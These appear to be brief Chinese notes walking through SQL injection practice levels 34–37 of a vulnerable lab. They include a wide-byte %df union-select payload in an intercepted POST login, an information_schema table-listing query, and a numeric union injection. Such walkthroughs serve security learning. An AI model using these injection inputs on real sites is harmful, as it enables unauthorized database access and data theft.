a这关和上面一样只不过get变成post 那就用burp
先随便输一个username 和password 抓包 改包
uname=aaa&passwd=aaa&submit=Submit 对这一串进行更改
uname=aaa%df’ union select 1,database() –+&passwd=aaa&submit=Submit 还是需要打上%df 就可以了
之后还是那套组合拳
group_concat(table_name) from information_schema.tables where table_schema=’database()’ –+
35和34 凑一凑吧 毕竟35真的不多的内容
这关就是数字型注入了那么反斜杠的过滤就没用了 直接?id=1 union select 1,2,3 –+ 然后就是标准组合拳
一套下来 就可以了
37和34一样 是我弄错什么了?